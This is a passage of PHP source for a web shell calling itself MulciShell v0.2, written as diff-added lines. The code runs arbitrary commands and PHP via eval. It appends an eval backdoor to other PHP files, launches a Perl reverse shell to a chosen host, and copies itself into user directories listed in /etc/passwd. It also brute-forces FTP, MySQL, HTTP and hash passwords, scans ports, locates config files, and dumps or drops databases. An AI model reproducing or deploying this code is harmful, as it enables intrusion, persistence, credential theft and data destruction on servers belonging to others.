+<tr><td>Server IP</td><td>Your IP</td><td>Disk space</td><td>Safe_mode?</td><td>Open_BaseDir?</td><td>System</td><td>Server software</td><td>Disabled functions</td><td>ID</td><td>Shell location</td></tr>
+<tr><td>$serv</td><td>$addr</td><td>$space of $total</td><td>$safe_mode</td><td>$open_basedir</td><td>$uname</td><td>$soft</td><td>$disable</td><td>$idval</td><td>".CleanDir(getcwd()).'/'.basename($_SERVER['PHP_SELF'])."</td></tr>
+</table></br>
+<div id='main'>";
+foreach($links as $val=>$addr) echo "<a href='$addr'>[ $val ]</a>";
+echo "</div><br>";
+if(isset($_POST['encryption']))
+{
+    $e=$_POST['encrypt'];
+    echo "<form action='$self?' method='post'><center><textarea rows='19' cols='75' readonly>MD5: ".md5($e)."\nSHA1: ".sha1($e)."\nCrypt: ".crypt($e)."\nCRC32: ".crc32($e)."\nBase64 Encoded: ".base64_encode($e)."\nBase64 decoded: ".base64_decode($e)."\nURL encode: ".urlencode($e)."\nURL decode: ".urldecode($e)."\nBin2Hex ".bin2hex($e)."\nDec2Hex: ".dechex($e)."</textarea><br><br>Input: <input type='text' style='width: 300px' name='encrypt'>
+    <br><input type='submit' value='Encrypt' name='encryption'></center>";
+}
+if(isset($_POST['dogetfile']))
+execmd("wget $_POST[wgetfile]",$disable);
+if(isset($_POST['doUpload']))
+{
+    $dir=$_POST['u_location'];
+    $name=$_FILES['u_file']['name'];
+    switch($_FILES['u_file']['error'])
+    {
+        case 0:
+        if(@move_uploaded_file($_FILES['u_file']['tmp_name'],$dir.'/'.$name))
+        echo "File uploaded successfully<br>";
+        else echo "Failed to upload file!";
+    }
+}
+if(isset($_POST['massfiles']))
+{
+    $fail=0;
+    $success=0;
+    switch($_POST['fileaction'])
+    {
+        case 'Infect': #Nothing special here, just kick them while they're down
+        foreach($_POST['files'] as $file)
+        {
+            $ext=strrchr($file,'.');
+            if($ext!=".php") continue;
+            @$fh=fopen($file,'a');
+            if(@is_resource($fh))
+            {
+                $success++;
+                @fwrite($fh,"<?php @eval(\$_GET['e']) ?>");
+                @fclose($fh);
+            } else $fail++;
+        }
+        echo "Successfully infected $success files; failed to infect $fail files</br>Exploit files as such: file.php?e=php code";
+        break;
+        case 'Delete':
+        foreach($_POST['files'] as $file)
+        {
+            if(is_dir($file)) rm_rep($file,$success,$fail);
+            else
+            {
+                if(@unlink(CleanDir($file)))
+                {
+                    echo "File $file deleted<br>";
+                    $success++;
+                }
+                else
+                {
+                    echo "Failed to delete file $file<br>";
+                    $fail++;
+                }
+            }
+        }
+        echo "Total files deleted: $success; failed to delete $fail files<br>";
+        break;
+        case 'Chmod':
+        foreach($_POST['files'] as $file)
+        {
+            if(is_dir($file)) chmod_rep($file,$success,$fail,$_POST['cmodv']);
+            if(@chmod(CleanDir($file),$_POST['cmodv']))
+            {
+                echo "Changed mode for $file<br>";
+                $success++;
+            }
+            else
+            {
+                echo "Failed to change mode for $file<br>";
+                $fail++;
+            }
+        }
+        echo "Total files modes modified: $success; failed to chmod $fail files<br>";
+        break;
+    }
+}
+if(isset($_POST['docrack']))
+{
+        $con=true;
+        $show=0;
+        $list=@fopen($_FILES['wordlist']['tmp_name'],'r');
+        if(is_resource($list))
+        {
+            if(isset($_POST['ftpcrack']))
+            {
+                echo "Bruting $_POST[ftp_user]@$_POST[ftp_host]...</br>";
+                if(!empty($_POST['ftp_port'])) $port=$_POST['ftp_port'];
+                else $port='3306';
+                if(empty($_POST['ftp_timeout'])||!preg_match("/^[0-9]$/",$_POST['ftp_timeout']))
+                $time=3;
+                else $time=$_POST['ftp_timeout'];
+                @$ftp=ftp_connect($_POST['ftp_host'],$port,$time);
+                if(!$ftp) $con=false;
+                if($con)
+                {
+                    $show++;
+                    while(!feof($list))
+                    {
+                        @$pass=fgets($list);
+                        if(ftp_login($ftp,$_POST['ftp_user'],trim($pass)))
+                        {
+                            echo "Password found! Password for $_POST[ftp_user] is $pass<br>";
+                            @ftp_close($ftp);
+                            break;
+                        }
+                        if($show==10000){echo "Trying pass $pass...</br>"; $show=0;}
+                    }
+                } else echo "Failed to connect!</br>";
+            } 
+            elseif(isset($_POST['remote_login']))
+            {
+                //if(!function_exists("jitghjytiojho")) die("cURL support has to be enabled.");
+                /*
+                $ch=curl_init($_POST['remote_login_target']);
+                curl_setopt($ch,CURLOPT_HEADER,0);
+                curl_setopt($ch,CURLOPT_POST,1);
+                curl_setopt($ch,CURLOPT_POSTFIELDS,'');
+                curl_exec($ch);
+                */
+                if(preg_match("/^http:\/\/+/",$_POST['remote_login_target'])) die("Do not include http:// in the target URL.");
+                $path=explode('/',$_POST['remote_login_target']);
+                $site=$path[0];
+                for($i=1;$i<count($path);$i++) $full_path.='/'.$path[$i];
+                
+            }
+            elseif(isset($_POST['vbcrack']))
+            {
+                if(empty($_POST['vbhash']) OR empty($_POST['vbsalt'])) die("Please specify a hash and salt");
+                while(!feof($list))
+                {
+                    $show++;
+                    $pass=trim(fgets($list));
+                    $vbenc=md5(md5($pass).$_POST['vbsalt']);
+                    if($vbenc===$_POST['vbhash'])
+                    {
+                        echo "Password for $_POST[vbhash] found! is $pass</br>";
+                        break;
+                    }
+                    if($show===10000)
+                    {
+                        $show=0;
+                        echo "Trying pass $pass...</br>";
+                    }
+                }
+                echo "Complete</br>";
+            }
+            elseif(isset($_POST['mysqlcrack']))
+            {
+                $host=$_POST['mysql_host'];
+                $user=$_POST['mysql_user'];
+                if(!empty($_POST['mysql_port']))  $host.=":$_POST[mysql_port]";
+                    while(!feof($list))
+                    {
+                        $show++;
+                        $pass=trim(fgets($list));
+                        if(@mysql_connect($host,$user,$pass))
+                        {
+                            echo "Password found! Password for $user is $pass</br>";
+                            break;
+                        }
+                        if($show==10000)
+                        {
+                            echo "Trying $pass...</br>";
+                            $show=0;
+                            continue;
+                        }
+                    }
+            } 
+            elseif(isset($_POST['authcrack']))
+            {
+                $arr=explode('/',$_POST['auth_url']);
+                $con_url=$arr[0];
+                if(empty($_POST['auth_url'])) die("Enter a target first...");
+                for($i=1;$i<count($arr);$i++) $path.='/'.$arr[$i]; 
+                if(preg_match("/^http:\/\/+/",$_POST['auth_url'])) die("Do not include http:// in the url");
+                while(!feof($list))
+                {
+                        if(is_resource($conn_url=fsockopen($con_url,80,$errno,$errstr,5)))
+                        {
+                            $show++;
+                            $pass=trim(fgets($list));
+                            if($show>5000) {$show=0; echo $pass;}
+                            $encode=base64_encode(trim($_POST['auth_user']).':'.$pass);
+                            $header="GET $path HTTP/1.1\r\n";
+                            $header.="Host: $con_url\r\n";
+                            $header.="Authorization: Basic $encode\r\n";
+                            $header.="Connection: Close\r\n\r\n";
+                            fputs($conn_url,$header,strlen($header));
+                            $tmp++;
+                            while(!feof($conn_url)) 
+                            {
+                                $tmp=fgets($conn_url);
+                                if(preg_match("/HTTP\/\d+\.\d+ 200+/",$tmp))
+                                {
+                                    echo "Password found! Password=$pass</br></br>";
+                                    break 2;
+                                }
+                            }
+                        }
+                }
+                echo "Done</br>";
+            }
+            elseif(isset($_POST['md5crack']))
+            {
+                if(empty($_POST['md5hash'])) die("Enter a hash before attempting to crack one ;)");
+                $md5=trim($_POST['md5hash']);
+                while(!feof($list))
+                {
+                    $show++;
+                    $pass=trim(fgets($list));
+                    if(md5($pass)===$md5)
+                    {
+                        echo "Password found! Plaintext for $md5 is $pass</br>";
+                        break;
+                    }
+                    if($show==10000)
+                    {
+                        echo "Trying $pass...</br>";
+                        $show=0;
+                        continue;
+                    }
+                 }
+            }
+            elseif(isset($_POST['sha1crack']))
+            {
+                if(empty($_POST['sha1hash'])) die("Enter a hash before attempting to crack one ;)");
+                $sha1=trim($_POST['sha1hash']);
+                while(!feof($list))
+                {
+                    $show++;
+                    $pass=trim(fgets($list));
+                    if(sha1($pass)===$sha1)
+                    {
+                        echo "Password found! Plaintext for $sha1 is $pass</br>";
+                        break;
+                    }
+                    if($show==10000)
+                    {
+                        echo "Trying $pass...</br>";
+                        $show=0;
+                        continue;
+                    }
+                 }
+            }
+        }
+        @fclose($list);
+}
+if(isset($_POST['port_scan']))
+{
+    switch($_POST['type'])
+    {
+        case 'php':
+            extract($_POST);
+            while($sport<=$eport)
+            {
+                echo "Trying port $sport";
+                if(@fsockopen($host,$sport,$errno,$errstr,2)) echo "Port $sport open</br>";
+                $sport++;
+            }
+        break;
+        default:
+            echo "Invalid request</br>";
+    }
+}
+if(isset($_POST['find_forums']))
+{
+    echo "<center><b>[ Forum locator ]</b></center></br></br>";
+    $found=0;
+    global $int_paths;
+    @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
+    while(!feof($fp))
+    {
+        @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
+        $path="/home/$user/public_html";
+        if(@is_dir($path))
+        {
+            foreach($int_paths as $forum_path)
+            {
+                $full_path=$path."/$forum_path/";
+                if(@is_dir($full_path))
+                {
+                    echo "[+] Forum found: Path: $full_path</br>";
+                    $found++;
+                    continue;
+                }
+            }
+        } 
+    }
+    echo "Scan complete. Found $found forums</br></br>";
+}
+function find_configs($path,&$found)
+{
+        if(@file_exists($path.'config.php'))
+        {
+            echo "Found config file: $path"."config.php</br>";
+            $found++;
+        }
+        @$dh=opendir($path);
+        while((@$file=readdir($dh)))
+        if(is_dir($file)&&$file!='.'&&$file!='..') find_configs($path.$file.'/',$found);
+        @closedir($dh);
+}
+if(isset($_POST['find_configs']))
+{
+    $found=0;
+    echo "<center><b>[ Config locator ]</b></center></br></br>";
+    @$fp=fopen($_POST['passwd'],'r') or die("Failed to open passwd file!");
+    while(!feof($fp))
+    {
+        @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($fp));
+        $path="/home/$user/public_html/";
+        find_configs($path,$found);
+    }
+    @fclose($fp);
+    echo "Scan complete. Found $found configs</br></br>";
+}
+if(isset($_POST['execmd']))
+{echo "<center><textarea rows='10' cols='100'>";
+echo execmd($_POST['cmd'],$disable);
+echo "</textarea></center>";}
+if(isset($_POST['execphp']))
+{echo "<center><textarea rows='10' cols='100'>";
+echo eval(stripslashes($_POST['phpcode']));
+echo "</textarea></center>";}
+if(isset($_POST['cnewfile']))
+{
+    if(@fopen($_POST['newfile'],'w')) echo "File created<br>";
+    else echo "Failed to create file<br>";
+}
+if(isset($_POST['cnewdir']))
+{
+    if(@mkdir($_POST['newdir'])) echo "Directory created<br>";
+    else echo "Failed to create directory<br>";
+}
+if(isset($_POST['doeditfile'])) FileEditor();
+switch($_GET['act'])
+{
+    case 'backc':
+    if(!isset($_POST['backconnip']))
+    {
+        echo "<center><form action='$self?act=backc' method='post'>
+        Address: <input type='text' value='$_SERVER[REMOTE_ADDR]' name='backconnip'>
+        Port: <input type='text' value='1337' name='backconnport'>
+        <input type='submit' value='Connect'></br></br>
+        Listen with netcat by executing 'nc -l -n -v -p 1337'</br></br>
+        <b>Note: Be sure to foward your port first</b>
+        </form></center>";
+    } else {
+        if(empty($_POST['backconnport'])||empty($_POST['backconnip'])) die("Specify a host/port");
+        if(is_writable("."))
+        {
+            @$fh=fopen(getcwd()."/bc.pl",'w');
+            @fwrite($fh,base64_decode($backconnect_perl));
+            @fclose($fh);
+            echo "Attempting to connect...</br>";
+            execmd("perl ".getcwd()."/bc.pl $_POST[backconnip] $_POST[backconnport]",$disable);
+            if(!@unlink(getcwd()."/bc.pl")) echo "<font color='#FF0000'>Warning: Failed to delete reverse-connection program</font></br>";
+            } else {
+                @$fh=fopen("/tmp/bc.pl","w");
+                @fwrite($fh,base64_decode($backconnect_perl));
+                @fclose($fh);
+                echo "Attempting to connect...</br>";
+                if(!@unlink("/tmp/bc.pl")) echo "<font color='#FF0000'><h2>Warning: Failed to delete reverse-connection program<</h2>/font></br>";
+        }
+    }
+    break;
+    case 'dbs': database_tools(); break;
+    case 'sql': SQLLogin(); break;
+    case 'sqledit': SQLEditor(); break;
+    case 'download': SQLDownload(); break;
+    case 'tools': show_tools(); break;
+    case 'logout': $_SESSION=array(); session_destroy(); echo "Logged out from MySQL.<br>"; break;
+    case 'f': FileEditor(); break;
+    case 'encode':Encoder(); break;
+    case 'bypass':security_bypass(); break;
+    case 'bf':brute_force(); break;
+    case 'bh': BackDoor(); break; 
+    case 'spread':
+    if(!isset($_POST['spread_shell']))
+    {
+        echo "<center><form action='?act=spread' method='post'>
+        This tool will attempt to copy the shell into every writable directory on the server, in order to allow access maintaining.</br>
+        Passwd file: <input type='text' value='/etc/passwd' name='passwd_file'></br>
+        <input type='submit' value='Spread' name='spread_shell'>
+        </form></center>";
+    } else {
+        $s=0;
+        @$file=fopen($_POST['passwd_file'],'r');
+        if(is_resource($file))
+        {
+            while(!feof($file))
+            {
+                @list($user,$x,$uid,$gid,$blank,$home_dir)=explode(":",fgets($file));
+                spread_self($user,$s);
+            }
+            @fclose($file);
+        }
+        echo ($s>0)?"Spread complete. Successfully managed to spread the shell $s times</br>":"Failed to spread the shell.</br>";
+    }
+    break;
+    case 'domains':
+    $header="GET /search/reverse-ip-domain.php?q=$_SERVER[HTTP_HOST] HTTP/1.0\r\n";
+    $header.="Host: searchy.protecus.de\r\n";
+    $header.="Connection: Close\r\n\r\n";
+    $domain_handle=fsockopen("searchy.protecus.de",80);
+    @fputs($domain_handle,$header,strlen($header));
+    while(@!feof($domain_handle))
+    {
+        echo fgets($domain_handle);
+    } 
+    break;
+    case 'kill':
+    if(!isset($_POST['justkill']))
+    {
+        echo "<center>Do you *really* want to kill the shell?<br><br><form action='$self?act=kill' method='post'>
+        <input type='submit' value='Yes' name='justkill'></center>";
+    } else {
+        if(@unlink(basename($_SERVER['PHP_SELF']))) echo "Shell deleted.<br>";
+        else echo "Failed to delete shell<br>";
+    }
+    break;
+    case 'sec':
+    $mysql_on=function_exists("mysql_connect")?"ON":"OFF";
+    $curl_on=function_exists("curl_init")?"ON":"OFF";
+    $magic_quotes_on=get_magic_quotes_gpc()?"ON":"OFF";
+    $register_globals_on=(@ini_get('register_globals')=='')?"OFF":"ON";
+    $include_on=(@ini_get('allow_url_include')=='')?"Disabled":"Enabled";
+    $etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
+    $ver=phpversion();
+    echo "<center>Security overview</center><table style='margin: auto;'><tr><td>PHP Version</td><td>Safe mode</td><td>Open_Basedir</td><td>Magic_Quotes</td><td>Register globals</td><td>
+    Remote includes</td><td>Read /etc/passwd?</td><td>MySQL</td><td>cURL</td></tr>
+    <tr><td>$ver</td><td>$safe_mode</td><td>$open_basedir</td><td>$magic_quotes_on</td><td>$register_globals_on</td><td>$include_on</td>
+    <td>$etc_passwd</td><td>$mysql_on</td><td>$curl_on</td>
+    </tr>";
+    "</table>";
+    break;
+    case 'enum':
+    $windows=0;
+    $path=CleanDir(getcwd());
+    if(!eregi("Linux",php_uname())) {$windows=1;}
+    if(!$windows)
+    {
+        $spath=str_replace("/home/","$serv/~",$path);
+        $spath=str_replace("/public_html/","/",$spath);
+        $URL="http://$spath/".basename($_SERVER['PHP_SELF']);
+        echo "Enumerated shell link: <a href='$URL'>$URL</a>";
+    } else echo "Enumeration failed<br>";
+    break;
+}
+echo "<br>";
+if(isset($_POST['sqlquery']))
+{
+    extract($_SESSION);
+    $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+    if($conn)
+    {
+        if(isset($_POST['db'])) @mysql_select_db($_POST['db']);
+        $post_query=@mysql_query(stripslashes($_POST['sqlquery'])) or die(mysql_error());
+        $affected=@mysql_num_rows($post_query);
+        echo "Affected rows: $affected<br>";
+    }
+}
+$dirs=array();
+$files=array();
+if(!isset($_GET['d'])) {$d=CleanDir(realpath(getcwd())); $dh=@opendir(".") or die("Permission denied!");}
+else {$d=CleanDir($_GET['d']); $dh=@opendir($_GET['d']) or die("Permission denied!");}
+$current=explode("/",$d);
+echo "<table style='width: 100%; text-align: center;'><tr><td>Current location: ";for($p=0;$p<count($current);$p++) 
+for($p=0;$p<count($current);$p++)
+{
+        $cPath.=$current[$p].'/';
+        echo "<a href=$self?d=$cPath>$current[$p]</a>/";
+}
+echo "</td></tr></table>";
+if(isset($_GET['d'])) echo "<form action='$self?d=$_GET[d]' method='post'>";
+else echo "<form action='$self?' method='post'>";
+echo "<table style='width: 100%'>
+<tr><td>File</td><td>Size</td><td>Owner/group</td><td>Perms</td><td>Writable</td><td>Modified</td><td>Action</td></tr>";
+while(($f=@readdir($dh)))
+{
+    if(@is_dir($d.'/'.$f)) $dirs[]=$f;
+    else $files[]=$f;
+}
+asort($dirs);
+asort($files);
+@closedir($dh);
+    foreach($dirs as $f)
+    {
+        @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
+        @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
+        if(is_array($grp)) $grp=$grp['name'];
+        if(is_array($own)) $own=$own['name'];
+        $size="DIR";
+        @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),2);
+        @$write=is_writable($d.'/'.$f)?"Yes":"No";
+        $mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
+        if($f==".") {continue;}
+        elseif($f=="..") 
+        {
+        $f=Trail($d.'/'.$f);
+        echo "<tr><td><a href='$self?act=files&d=$f'>..</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td>None</td></tr>";
+        continue;
+        }
+        echo "<tr><td><a href='$self?act=files&d=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
+    }
+    foreach($files as $f)
+    {
+        @$own=function_exists("posix_getpwuid")?posix_getpwuid(fileowner($d.'/'.$f)):fileowner($d.'/'.$f);
+        @$grp=function_exists("posix_getgrgid")?posix_getgrgid(filegroup($d.'/'.$f)):filegroup($d.'/'.$f);
+        if(is_array($grp)) $grp=$grp['name'];
+        if(is_array($own)) $own=$own['name'];
+        @$size=TrueSize(filesize($d.'/'.$f));
+        @$ch=substr(base_convert(fileperms($d.'/'.$f),10,8),3);
+        @$write=is_writable($d.'/'.$f)?"Yes":"No";
+        @$mod=date("d/m/Y H:i:s",filemtime($d.'/'.$f));
+        echo "<tr><td><a href='$self?act=f&file=$d/$f'>$f</a></td><td>$size</td><td>$own/$grp</td><td>$ch</td><td>$write</td><td>$mod</td><td><input type='checkbox' name='files[]' id='check' value='$d/$f'></td></tr>";
+    }
+    echo "</table>
+    <input type='button' style='background-color: none; border: 1px solid white;' value='Toggle' onClick='togglecheck()'></br>
+    With checked file(s): 
+    <select name='fileaction'>
+    <option name='chmod'>Chmod</option>
+    <option name='delete'>Delete</option>
+    <option name='infect'>Infect</option><input type='text' value='chmod value' name='cmodv'>
+    </select>
+    <br><input type='submit' value='Go' name='massfiles'></form>";
+function SQLLogin()
+{
+    global $self;
+    if(!isset($_SESSION['log'])&&!isset($_POST['mconnect']))
+    {
+        echo "<center><form action='$self?act=sql' method='post'>
+        Host: <input type='text' value='localhost' name='mhost'>
+        Username: <input type='text' value='root' name='muser'>
+        Password: <input type='password' value='' name='mpass'>
+        Port: <input type='text' style='width: 40px' value='3306' name='mport'>
+        <input type='submit' value='Connect' name='mconnect'>
+        </form>
+    </center>";
+    } 
+    elseif(!isset($_SESSION['log'])&&isset($_POST['mconnect']))
+    {
+        extract($_POST);
+        $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+        if($conn)
+        {
+            $_SESSION['muser']=$muser;
+            $_SESSION['mhost']=$mhost;
+            $_SESSION['mpass']=$mpass;
+            $_SESSION['mport']=$mport;
+            $_SESSION['log']=true;
+            header("Location: $self?act=sqledit");
+        }
+            else 
+            echo "Failed to login with $muser@$mhost!<br>";
+    } else {
+        header("Location: $self?act=sqledit");
+    }
+}
+function SQLEditor()
+{
+    extract($_SESSION);
+    $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+    if($conn)
+    {
+            echo "Logged in as $muser@$mhost <a href='$self?act=logout'>[Logout]</a><center>";
+            echo "<form method='POST' action='$self?'>
+            Quick SQL query: <input type='text' style='width: 300px' value='select * from users' name='sqlquery'>
+            <input type='hidden' name='db' value='$_GET[db]'>
+            <input type='submit' value='Go' name='sql'>
+            </form>";
+            echo "<form action='$self?act=sqledit' method='post'>
+            <input type='submit' style='border: none;' value='[ List Processes ]' name='sql_list_proc'>
+            </form></center></br></br>";
+            if(isset($_POST['sql_list_proc']))
+            {
+                $res=mysql_list_processes();
+                echo "<table style='margin: auto; text-align: center;'><tr>
+                <td>Proc ID</td><td>Host</td><td>DB</td><td>Command</td><td>Time</td>
+                </tr>";
+                while($r=mysql_fetch_assoc($res)) echo "<tr><td>$r[Id]</td><td>$r[Host]</td><td>$r[db]</td><td>$r[Command]</td><td>$r[Time]</td></tr>";
+                mysql_free_result($res);
+                echo "</table></br>";
+            }
+        if(!isset($_GET['db']))
+        {
+            if(isset($_POST['dbc'])) db_create();
+            if(isset($_GET['dropdb'])) SQLDrop();
+            echo "<table style='margin: auto; text-align: center;'>
+            <tr><td>Database</td><td>Table count</td><td>Download</td><td>Drop</td></tr>";
+            $all_your_base=mysql_list_dbs($conn);
+            while($your_base=mysql_fetch_assoc($all_your_base))
+            {
+                $tbl=mysql_query("SHOW TABLES FROM $your_base[Database]");
+                $tbl_count=mysql_num_rows($tbl);
+                echo "<tr><td><a href='$self?act=sqledit&db=$your_base[Database]'>$your_base[Database]</td><td>$tbl_count</td><td><a href='$self?act=download&db=$your_base[Database]'>Download</a></td><td><a href='$self?act=sqledit&dropdb=$your_base[Database]'>Drop</a></td></tr>";
+            }
+            echo "</table></br><center><form action='$self?act=sqledit' method='post'>New database name: <input type='text' value='new_database' name='db_name'><input type='submit' style='border: none;' value='[ Create Database ]' name='dbc'></form></center></br>";
+        }
+        elseif(isset($_GET['db'])&&!isset($_GET['tbl']))
+        {
+            if(isset($_POST['tblc'])) table_create();
+            if(isset($_GET['droptbl'])) SQLDrop();
+            echo "<table style='margin: auto; text-align: center;'>
+            <tr><td>Table</td><td>Column count</td><td>Dump</td><td>Drop</td></tr>";
+            $tables=mysql_query("SHOW TABLES FROM $_GET[db]");
+            while($tblc=mysql_fetch_array($tables))
+            {
+                $fCount=mysql_query("SHOW COLUMNS FROM $_GET[db].$tblc[0]");
+                $fc=mysql_num_rows($fCount);
+                echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$tblc[0]'>$tblc[0]</a></td><td>$fc</td><td><a href='$self?act=download&db=$_GET[db]&tbl=$tblc[0]'>Dump</td><td><a href='$self?act=sqledit&db=$_GET[db]&droptbl=$tblc[0]'>Drop</a></td></tr>";
+            }
+            echo "</table></br><center><form action='$self?act=sqledit&db=$_GET[db]' method='post'>Create new table: <input type='text' value='new_table' name='table_name'><input type='hidden' value='$_GET[db]' name='db_current'> <input type='submit' style='border: none;' value='[ Create Table ]' name='tblc'></form></center>";
+        }
+            elseif(isset($_GET['field'])&&isset($_POST['sqlsave']))
+            {
+                $discard_values=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
+                $values=mysql_fetch_assoc($discard_values);
+                $keys=array_keys($values);
+                $values=array();
+                foreach($_POST as $k=>$v)
+                if(in_array($k,$keys)) $values[]=$v;
+                $query="UPDATE $_GET[db].$_GET[tbl] SET ";
+                for($y=0;$y<count($values);$y++)
+                {
+                    if($y==count($values)-1)
+                    $query.="$keys[$y]='$values[$y]' ";
+                    else
+                    $query.="$keys[$y]='$values[$y]', ";
+                }
+                $query.="WHERE $_GET[field] = '$_GET[v]'";
+                $try=mysql_query($query) or die(mysql_error());
+                echo "<center>Table updated!<br>";
+                echo "<a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]'>Go back</a><br><br>";
+                
+            }
+            elseif(isset($_GET['field'])&&isset($_GET['v'])&&!isset($_GET['del']))
+            {
+                echo "<center><form action='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$_GET[field]&v=$_GET[v]' method='post'>";
+                $sql_fields=array();
+                $fields=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
+                while($field=mysql_fetch_assoc($fields)) $sql_fields[]=$field['Field'];
+                $data=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]='$_GET[v]'");
+                $d_piece=mysql_fetch_assoc($data);
+                for($m=0;$m<count($sql_fields);$m++)
+                {
+                    $point=$sql_fields[$m];
+                    echo "$point: <input type='text' value='$d_piece[$point]' name='$sql_fields[$m]'></br>";
+                }
+                echo "<input type='submit' value='Save' name='sqlsave'></form></center>";
+            }
+            elseif(isset($_GET['db'])&&isset($_GET['tbl']))
+            {
+                if(isset($_GET['insert'])) SQLInsert();
+                if(isset($_GET['field'])&&isset($_GET['v'])&&isset($_GET['del']))
+                {
+                    echo "<center>";
+                    if(@mysql_query("DELETE FROM $_GET[db].$_GET[tbl] WHERE $_GET[field]=$_GET[v]")) echo "Row deleted</br>";
+                    else echo "Failed to delete row</br>";
+                    echo "</center>";
+                }
+                echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&insert=1'>[Insert new row]</a></center>";
+                echo "<table style='margin: auto; text-align: center;'><tr>";
+                $cols=mysql_query("SHOW COLUMNS FROM $_GET[db].$_GET[tbl]");
+                $fields=array();
+                while($col=mysql_fetch_assoc($cols))
+                {
+                    array_push($fields,$col['Field']);
+                    echo "<td>$col[Field]</td>";
+                }
+                echo "</tr>";
+                if(isset($_GET['s'])&&is_numeric($_GET['s']))
+                {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT $_GET[s], 250");}
+                else
+                {$selector=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl] LIMIT 0, 250");}
+                while($select=mysql_fetch_row($selector))
+                {
+                    echo "<tr>";
+                    for($i=0;$i<count($fields);$i++)
+                    {
+                        echo "<td>".htmlspecialchars($select[$i])."</td>";    
+                    }
+                    echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]'>Edit</a></td><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&field=$fields[0]&v=$select[0]&del=true'>Delete</a></td>";
+                    echo "</tr>";
+                }
+                echo "</table>";
+                echo "<table style='margin: auto;'>";
+                if(isset($_GET['s']))
+                {
+                    $prev=intval($_GET['s'])-250;
+                    $next=intval($_GET['s'])+250;
+                    if($_GET['s']>0)
+                    echo "<tr><td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$prev'>Previous</a></td>";
+                    if(mysql_num_rows($selector)>249)
+                    echo "<td><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=$next'>Next</a></td></tr>";
+                }
+                else echo "<center><a href='$self?act=sqledit&db=$_GET[db]&tbl=$_GET[tbl]&s=250'>Next</a></center>";
+                echo "</table>";
+            }
+    else
+    {
+        $_SESSION=array();
+        session_destroy();
+        header("Location: $self?act=sql");
+    }
+ }
+}
+function SQLDownload() 
+{
+    extract($_SESSION);
+    $conn=@mysql_connect($mhost.":".$mport,$muser,$mpass);
+    if($conn)
+    {
+        if(isset($_GET['db'])&&!isset($_GET['tbl']))
+        {
+            $tables=array();
+            $dump_file="##################SQL Database dump####################\n";
+            $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n\n";
+            $get_tables=mysql_query("SHOW TABLES FROM $_GET[db]");
+            while($current_table=mysql_fetch_array($get_tables))
+            $tables[]=$current_table[0];
+            foreach($tables as $table_dump)
+            {
+                $data_selection=mysql_query("SELECT * FROM $_GET[db].$table_dump");
+                while($current_data=mysql_fetch_assoc($data_selection))
+                {
+                    $fields=implode("`, `", array_keys($current_data));
+                    $values=implode("`, `",array_values($current_data));
+                    $dump_file.="INSERT INTO `$table_dump` ($fields) VALUES ($values); ";
+                }
+            }
+        } elseif(isset($_GET['db'])&&isset($_GET['tbl']))
+        {
+            $dump_file="##################SQL Database dump####################\n";
+            $dump_file.="######################Dumped by: MulciShell v0.2 - Edited By KingDefacer#####################\n";
+            $table_dump=mysql_query("SELECT * FROM $_GET[db].$_GET[tbl]");
+            while($table_data=mysql_fetch_assoc($table_dump))
+            {
+                $fields=implode("`, `",array_keys($table_data));
+                $values=implode("`, `",array_values($table_data));
+                $dump_file.="INSERT INTO `$_GET[db].$_GET[tbl]` ($fields) VALUES ($values`)\n";
+            }
+        } else {
+            echo "Invalid!";
+        }
+    }
+    $dump_file.="########################################################################################";
+    if(!isset($_GET['tbl']))
+    $file_name="$_GET[db]"."_DUMP.sql";
+    else $file_name="$_GET[db]"."_$_GET[tbl]"."_DUMP.sql";
+    ob_get_clean();
+    header("Content-type: application/octet-stream");
+    header("Content-length: ".strlen($dump_file));
+      header("Content-disposition: attachment; filename=$file_name;");
+      echo $dump_file;
+    exit;
